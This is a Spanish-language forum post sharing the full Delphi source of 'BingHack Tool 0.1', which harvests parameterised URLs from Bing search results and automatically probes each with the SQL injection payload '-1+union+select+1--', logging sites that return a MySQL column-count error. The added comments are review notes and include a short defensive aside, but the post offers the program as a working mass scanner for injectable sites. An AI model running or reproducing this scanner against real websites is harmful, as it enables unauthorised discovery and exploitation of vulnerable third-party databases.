[Delphi] BingHack Tool 0.1

Iniciado por BigBear, 31 Mayo 2013, 20:53 PM


BigBear

Traducción a Delphi de este programa para buscar páginas vulnerables a SQLi usando Bing.

Una imagen :



El codigo :


// BingHackTool 0.1
// Coded By Doddy H

unit bing;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, sButton, sMemo, sSkinManager, PerlRegEx, IdBaseComponent,
  IdComponent, IdTCPConnection, IdTCPClient, IdHTTP, sEdit, sLabel, sGroupBox,
  sListBox, ComCtrls, sStatusBar, ShellApi, jpeg, ExtCtrls;

type
  // Single form of the tool. The component fields are presumably bound to the
  // form resource pulled in by {$R *.dfm}; their properties (and the wiring of
  // buttons to the handlers declared below) live in that .dfm, not in this unit.
  TForm1 = class(TForm)
    // HTTP client shared by both the search step and the probe step.
    IdHTTP1: TIdHTTP;
    // Regex used to pull result links out of the search HTML and, later, to
    // look for the database error text in probe responses.
    PerlRegEx1: TPerlRegEx;
    sSkinManager1: TsSkinManager;
    // Regex used to cut each result link at its first '='.
    PerlRegEx2: TPerlRegEx;
    sGroupBox1: TsGroupBox;
    sLabel1: TsLabel;
    // Search text sent to Bing (read by sButton1Click).
    sEdit1: TsEdit;
    sLabel2: TsLabel;
    // Number of result pages to fetch; parsed with StrToInt in sButton1Click.
    sEdit2: TsEdit;
    sGroupBox2: TsGroupBox;
    // Candidate URLs collected from the search results.
    sListBox1: TsListBox;
    sGroupBox3: TsGroupBox;
    // URLs whose probe response contained the database error text.
    sListBox2: TsListBox;
    // Panel 0 carries the progress text written by the click handlers.
    sStatusBar1: TsStatusBar;
    sGroupBox4: TsGroupBox;
    sButton1: TsButton;
    sButton2: TsButton;
    sButton3: TsButton;
    sButton4: TsButton;
    Image1: TImage;
    // Search step: fills sListBox1 and appends to bing-search.txt.
    procedure sButton1Click(Sender: TObject);
    // Closes the form.
    procedure sButton4Click(Sender: TObject);
    // Shows the author's contact message.
    procedure sButton3Click(Sender: TObject);
    // Loads the skin and makes the logs folder the current directory.
    procedure FormCreate(Sender: TObject);
    // Probe step: requests each URL in sListBox1 with a fixed UNION suffix.
    procedure sButton2Click(Sender: TObject);
    // Open the two log files with the shell's default handler.
    procedure sListBox1DblClick(Sender: TObject);
    procedure sListBox2DblClick(Sender: TObject);

  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  // Global form instance. The handlers in this unit reach it directly
  // (Form1.sStatusBar1, Form1.Close) instead of going through Self.
  // Presumably created by the project file — not visible in this unit.
  Form1: TForm1;

implementation

{$R *.dfm}

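// Appends one line of text to a file, creating the file if it does not exist.
//
// Parameters:
//   filename - path of the log file; the callers in this unit pass bare file
//              names, so it resolves against the current directory.
//   texto    - line to write, followed by a line break.
//
// Raises: the I/O exceptions of Append/Rewrite/Writeln propagate to the
// caller (assuming the default {$I+} I/O checking).
//
// Security note: texto is written verbatim. Both callers pass strings cut out
// of HTML fetched from remote servers, so the resulting file holds untrusted
// content and should be treated as such by anything that later parses it.
procedure savefile(filename, texto: string);
var
  ar: TextFile;
begin
  AssignFile(ar, filename);
  // Kept so the global keeps the value the original code left it at. Per the
  // RTL documentation FileMode governs Reset on typed/untyped files, so it is
  // not expected to influence the Append/Rewrite calls below.
  FileMode := fmOpenWrite;

  if FileExists(filename) then
    Append(ar)
  else
    Rewrite(ar);

  // The file is open from here on: close it even if the write fails
  // (disk full, handle revoked), otherwise the handle leaks and the next
  // call on the same file name can fail.
  try
    Writeln(ar, texto);
  finally
    CloseFile(ar);
  end;
end;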

// Form start-up: activates the 'falloutstyle' skin from <exe folder>Data and
// switches the process's current directory to <exe folder>/logs, creating
// that folder first when it is missing. Every relative file name used later
// in this unit (bing-search.txt, sqli-founds.txt) therefore lands in logs.
procedure TForm1.FormCreate(Sender: TObject);
var
  exeFolder: string;
  logFolder: string;
begin
  // Folder of the running executable; reused for both paths below.
  exeFolder := ExtractFilePath(Application.ExeName);

  sSkinManager1.SkinDirectory := exeFolder + 'Data';
  sSkinManager1.SkinName := 'falloutstyle';
  sSkinManager1.Active := True;

  logFolder := exeFolder + '/logs';

  // CreateDir's Boolean result is not inspected; a failure surfaces in ChDir.
  if not DirectoryExists(logFolder) then
    CreateDir(logFolder);

  ChDir(logFolder);
end;

// Search step: queries Bing with the text in sEdit1 and fills sListBox1 with
// the result links, each cut just after its first '='.
//
// For every i in 1..StrToInt(sEdit2.text) it fetches
// http://www.bing.com/search?q=<query>&first=<i*10> through IdHTTP1, takes the
// href of each '<h3><a href="' anchor in the returned HTML, and keeps only the
// links that contain '='. The collected list is then sorted, de-duplicated and
// appended line by line to bing-search.txt (a relative name, so it is written
// to the current directory, which FormCreate sets to the logs folder).
//
// Raises: StrToInt raises when sEdit2 does not hold an integer, and exceptions
// from IdHTTP1.Get are not caught here, so either one aborts the handler and
// leaves the status bar on the last progress message.
//
// NOTE(review): the search text goes into the URL without URL-encoding and the
// request uses plain http.
// NOTE(review): everything stored and logged here comes from remote HTML and
// is untrusted input for the probe step and for anyone opening the log file.
procedure TForm1.sButton1Click(Sender: TObject);
var
  code: string;
  link1: string;
  linkfinal: string;
  z: integer;
  i: integer;
  ii: integer;
  chau: TStringList;
  target: string;

begin

  sListBox1.Items.Clear;

  // Empty flag set: StringReplace substitutes only the first space.
  target := StringReplace(sEdit1.text, ' ', '+', []);

  sStatusBar1.Panels[0].text := '[+] Loading ...';
  Form1.sStatusBar1.Update;

  for i := 1 to StrToInt(sEdit2.text) do
  begin
    // Value passed as the 'first' query parameter: 10, 20, 30, ...
    ii := i * 10;
    sListBox1.Update;
    sStatusBar1.Panels[0].text := '[+] Searching in page : ' + IntToStr(ii);
    Form1.sStatusBar1.Update;

    // Synchronous GET on the UI thread; the form does not process messages
    // while it runs, hence the explicit Update calls above.
    code := IdHTTP1.Get('http://www.bing.com/search?q=' + target + '&first=' +
        IntToStr(ii));

    // Result links are recognised purely by this markup pattern.
    PerlRegEx1.Regex := '<h3><a href="(.*?)"';
    PerlRegEx1.Subject := code;

    while PerlRegEx1.MatchAgain do
    begin
      // The pattern has one capture group; the loop leaves link1 holding the
      // last sub-expression.
      for z := 1 to PerlRegEx1.SubExpressionCount do
        link1 := PerlRegEx1.SubExpressions[z];

      // Group 1 is lazy, so it stops at the first '='; links without any '='
      // do not match and are dropped.
      PerlRegEx2.Regex := '(.*?)=(.*?)';
      PerlRegEx2.Subject := link1;

      if PerlRegEx2.Match then
      begin
        // Keep everything up to and including the first '='.
        linkfinal := PerlRegEx2.SubExpressions[1] + '=';
        sListBox1.Items.Add(linkfinal);
      end;
    end;
  end;

  // NOTE(review): chau is never freed in this procedure.
  chau := TStringList.Create;

  // A sorted list with dupIgnore silently drops repeated entries on Assign.
  chau.Duplicates := dupIgnore;
  chau.Sorted := True;
  chau.Assign(sListBox1.Items);
  sListBox1.Items.Clear;
  sListBox1.Items.Assign(chau);

  // Appends to the existing file; earlier runs are kept, so the log can hold
  // duplicates across runs.
  for i := sListBox1.Items.Count - 1 downto 0 do
  begin
    savefile('bing-search.txt', sListBox1.Items[i]);
  end;

  sStatusBar1.Panels[0].text := '[+] Done';
  Form1.sStatusBar1.Update;

end;

// Probe step: for each URL in sListBox1 (last to first) requests
// <url> + '-1+union+select+1--' through IdHTTP1 and, when the response body
// contains 'The used SELECT statements have a different number of columns',
// adds the URL to sListBox2 and appends it to sqli-founds.txt.
//
// What a match means for the page that answered: that text is MySQL's error
// for a UNION whose SELECTs differ in column count, so the parameter value
// reached the SQL statement as SQL rather than as data, and the application
// echoes database errors to the client. Parameterised queries / prepared
// statements remove the first condition; generic error pages with server-side
// logging remove the second (which only hides the symptom, not the injection).
//
// Detection: the suffix '-1+union+select+1--' is appended unchanged to every
// request, so it shows up verbatim in the query string recorded by web-server
// access logs and is a straightforward match for WAF / IDS rules.
//
// NOTE(review): the URLs come from remote search HTML and are passed to
// IdHTTP1.Get as-is; no scheme or host validation happens in this unit.
procedure TForm1.sButton2Click(Sender: TObject);
var
  i: integer;
  code: string;

begin

  sListBox2.Items.Clear;

  sStatusBar1.Panels[0].text := '[+] Loading ...';
  Form1.sStatusBar1.Update;

  for i := sListBox1.Items.Count - 1 downto 0 do
  begin
    try
      begin

        sStatusBar1.Panels[0].text := '[+] Scanning : ' + sListBox1.Items[i];
        Form1.sStatusBar1.Update;
        sListBox2.Update;
        // Synchronous GET on the UI thread, one request per listed URL.
        code := IdHTTP1.Get(sListBox1.Items[i] + '-1+union+select+1--');

        // The message is used as a regex pattern; it contains no
        // metacharacters, so it behaves as a plain substring search.
        PerlRegEx1.Regex :=
          'The used SELECT statements have a different number of columns';
        PerlRegEx1.Subject := code;

        if PerlRegEx1.Match then
        begin
          sListBox2.Items.Add(sListBox1.Items[i]);
          savefile('sqli-founds.txt', sListBox1.Items[i]);
        end;

      end;
    except
      // Both handlers are empty: HTTP error statuses and every other
      // exception (including file-write failures from savefile) are
      // discarded and the loop moves on to the next URL.
      on E: EIdHttpProtocolException do
        ;
      on E: Exception do
        ;
    end;

    // Still inside the for loop: the status is reset to 'Done' after every
    // URL, not once at the end.
    sStatusBar1.Panels[0].text := '[+] Done';
    Form1.sStatusBar1.Update;

  end;

end;

// Shows the author's contact address in a modal message box.
procedure TForm1.sButton3Click(Sender: TObject);
const
  ContactText = 'Contact to lepuke[at]hotmail[com]';
begin
  ShowMessage(ContactText);
end;

// Closes the form through the global Form1 variable (not through Self).
procedure TForm1.sButton4Click(Sender: TObject);
begin
  Form1.Close;
end;

// Double-click on the search list: asks the shell to open bing-search.txt
// with its default handler. The name is relative and no directory is passed,
// so it resolves against the current directory. ShellExecute's result is
// ignored, so a missing file fails silently.
procedure TForm1.sListBox1DblClick(Sender: TObject);
const
  SearchLog = 'bing-search.txt';
begin
  ShellExecute(Handle, 'open', SearchLog, nil, nil, SW_SHOWNORMAL);
end;

// Double-click on the findings list: asks the shell to open sqli-founds.txt
// with its default handler. The name is relative and no directory is passed,
// so it resolves against the current directory. ShellExecute's result is
// ignored, so a missing file fails silently.
procedure TForm1.sListBox2DblClick(Sender: TObject);
const
  FindingsLog = 'sqli-founds.txt';
begin
  ShellExecute(Handle, 'open', FindingsLog, nil, nil, SW_SHOWNORMAL);
end;

end.

// The End ?


Si quieren bajar el programa, pueden hacerlo de acá.